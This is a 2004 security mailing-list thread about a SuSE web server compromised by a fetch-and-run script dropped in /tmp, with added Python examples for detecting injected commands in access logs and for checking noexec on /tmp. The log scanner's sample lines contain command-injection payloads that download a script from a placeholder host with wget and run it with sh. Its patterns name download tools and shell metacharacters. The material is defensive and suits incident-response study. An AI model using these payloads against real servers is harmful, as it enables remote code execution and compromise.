Re: [suse-security] Backdoor over http(s)??
I have got in /cgi-bin/ directory:
-neomail (1.26)
-openwebmail (2.30)
-SuSE things
-sanecgi
but nothing else.
And I have Phpnuke 6.9 (?? PHP ??)
-----
Ok, somebody could use wget, but what about the .do.sh --> how was it possible to execute it?
Tibor

On Tue, 13 Jan 2004 10:33:27 -0500 (EST), Rick Green wrote:
Before you get too involved in analysing the content of the file that was imported to your machine, you may want to close the facility that allowed the download in the first place! What have you got in your cgi-bin directory that allows arbitrary use of wget?
-- Rick Green
"They that can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." -Benjamin Franklin
Hi Mátyás,
On Tue, 13.01.2004 at 17:33, Mátyás Tibor wrote:
I have got in /cgi-bin/ directory:
-neomail (1.26)
-openwebmail (2.30)
-SuSE things
-sanecgi
but nothing else.
And I have Phpnuke 6.9 (?? PHP ??)
Did you check PHPNuke? I wouldn't trust this piece of software further than I can throw my Gateway bigtower case ;-) PostNuke and PHPNuke are known to be notoriously weak when it comes to security.
-----
Ok, somebody could use wget, but what about the .do.sh --> how was it possible to execute it?
Without knowing anything else I'd suspect PHPNuke to be the open door. It may contain a bug that allows passing executable content as a parameter. This has been the case very often in the past, as the developers of those two projects don't seem to be too concerned about evaluating the parameters at runtime. Have a look at this:
http://www.gulftech.org/01032004.php
or
http://www.securitytracker.com/alerts/2003/Dec/1008562.html
I really wouldn't use PostNuke or PHPNuke, as there seemingly has never been any code audit, since new weaknesses based on poor programming are discovered regularly.
just my 0.02 euro ;-)
Tobias
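Rick's question (what lets an attacker run wget?) and Tobias's suspicion (a parameter that ends up in a shell) both point at the same evidence: the fetch-and-run command has to travel through a request, so it normally lands in the web server's access log. The script below is an added example written for this thread, not code from the list, from PHPNuke or from any of the cgi-bin programs named above. It parses Apache combined-format lines, URL-decodes the query string, and flags entries where a shell metacharacter appears together with a download tool, a /tmp path or an interpreter name. The log lines, hosts and script paths are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" format:
#   host ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of a fetch-and-run payload smuggled through a query parameter.
# The query is URL-decoded first, so "%3B" and ";" are treated alike.
SHELL_META = re.compile(r'[;|`]|\$\(|&&|\|\|')
DOWNLOADERS = re.compile(r'\b(wget|curl|lynx|fetch|ftp)\b', re.IGNORECASE)
TMP_OR_EXEC = re.compile(r'/tmp/|\bchmod\b|\bsh\b|\bperl\b', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    path, _, query = entry['path'].partition('?')
    entry['script'] = path
    entry['query'] = unquote_plus(query)
    return entry


def classify(entry):
    """Return indicator names for a parsed entry; an empty list means not flagged.

    A download tool or /tmp path on its own is too noisy (someone can search
    for "wget manual"), so a line is flagged only when a shell metacharacter
    appears together with at least one other indicator.
    """
    q = entry['query']
    hits = []
    if SHELL_META.search(q):
        hits.append('shell-metachar')
    if DOWNLOADERS.search(q):
        hits.append('download-tool')
    if TMP_OR_EXEC.search(q):
        hits.append('tmp-or-exec')
    if 'shell-metachar' in hits and len(hits) > 1:
        return hits
    return []


def scan(lines):
    """Return (host, script, decoded query, hits) for every flagged line."""
    flagged = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            flagged.append((entry['host'], entry['script'], entry['query'], hits))
    return flagged


# Constructed sample log lines (not taken from the poster's server).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Jan/2004:10:01:02 +0100] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [13/Jan/2004:10:02:17 +0100] "GET /index.php?op=view%3Bwget%20http://192.0.2.9/.do.sh%20-O%20/tmp/.do.sh%3Bsh%20/tmp/.do.sh HTTP/1.0" 200 512 "-" "Wget/1.8"',
    '192.0.2.44 - - [13/Jan/2004:10:02:19 +0100] "GET /cgi-bin/example.cgi?id=x|`wget%20http://192.0.2.9/x%20-O%20/tmp/x`| HTTP/1.0" 500 0 "-" "Wget/1.8"',
    '10.0.0.6 - - [13/Jan/2004:10:05:00 +0100] "GET /search.php?q=wget+manual HTTP/1.1" 200 3001 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for host, script, query, hits in scan(SAMPLE_LOG):
        print(host, script, hits)
        print('    ', query)
```

Run it over the real access_log instead of SAMPLE_LOG to find the request that pulled .do.sh in; the flagged script name is the component to patch or remove. POST bodies are not logged by default, so a clean result from this scan only rules out GET-based injection.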
Mátyás Tibor wrote:
First off, there was a "backdoor" during 2003 (don't remember when) in the SSL-libs, which could be used via Apache to put files in the /tmp dir... (I know this because I found such files myself.)
And I have Phpnuke 6.9 (?? PHP ??)
PHPNuke is riddled with security flaws; 6.9 has had security patches for admin.php and the weblinks & downloads modules. Depends on whether you patch your server or not...
Ok, somebody could use wget, but what about the .do.sh --> how was it possible, to execute it?
/tmp is an executable directory, isn't it?! Normally "hackers" who gain access through some backdoor need to gain access to the machine, then try to execute a lot of tests to see if any local exploits are available, to see if they can get root access. My own experience a month back told me so (an old RH 7.0 machine got hacked).
//Mattias
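On Mattias's point that /tmp is executable: whether it is depends on the mount options of the filesystem that holds it, and on a one-partition box /tmp simply inherits the root filesystem's options. The following is an added example, not code from the thread, that answers that question from /proc/mounts-style text (longest matching mount point wins, so /var/tmp is not mistaken for a separate /tmp mount) and, on Linux, from the live kernel via statvfs. The mount tables are constructed for the example. The caveat a practitioner wants: noexec blocks `/tmp/.do.sh` run directly, but not `sh /tmp/.do.sh`, which is the usual shape of a fetch-and-run payload, so the option narrows the hole without closing it.

```python
import os


def mount_for(path, mounts_text):
    """Return (mountpoint, option list) for the mount that holds `path`.

    `mounts_text` is /proc/mounts-style text: "device mountpoint fstype options ...".
    The longest mount point that is a path prefix wins, so /var/tmp/x is not
    attributed to a separate /tmp mount.
    """
    best = None
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mnt, opts = fields[1], fields[3].split(',')
        prefix = mnt.rstrip('/') + '/'
        if path == mnt or path.startswith(prefix):
            if best is None or len(mnt) > len(best[0]):
                best = (mnt, opts)
    return best


def is_noexec(path, mounts_text):
    """True if the mount holding `path` carries the noexec option."""
    found = mount_for(path, mounts_text)
    return found is not None and 'noexec' in found[1]


def is_noexec_live(path):
    """Same question asked of the running kernel via statvfs (Linux only)."""
    flag = getattr(os, 'ST_NOEXEC', None)
    if flag is None:
        raise NotImplementedError('os.ST_NOEXEC not available on this platform')
    return bool(os.statvfs(path).f_flag & flag)


# Constructed mount tables for the example; not taken from the poster's box.
MOUNTS_TMP_ON_ROOT = "/dev/hda1 / reiserfs rw 0 0\n"
MOUNTS_TMP_NOEXEC = (
    "/dev/hda1 / reiserfs rw 0 0\n"
    "/dev/hda3 /tmp ext3 rw,nosuid,nodev,noexec 0 0\n"
)

if __name__ == '__main__':
    for name, table in (('root only', MOUNTS_TMP_ON_ROOT),
                        ('separate /tmp', MOUNTS_TMP_NOEXEC)):
        print(name, '-> /tmp/.do.sh noexec:', is_noexec('/tmp/.do.sh', table))
```

Feed `open('/proc/mounts').read()` to `is_noexec` to check the box in question; `is_noexec_live('/tmp')` gives the same answer without parsing.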
participants (3)
- Mattias Pettersson
- Mátyás Tibor
- Tobias Weisserth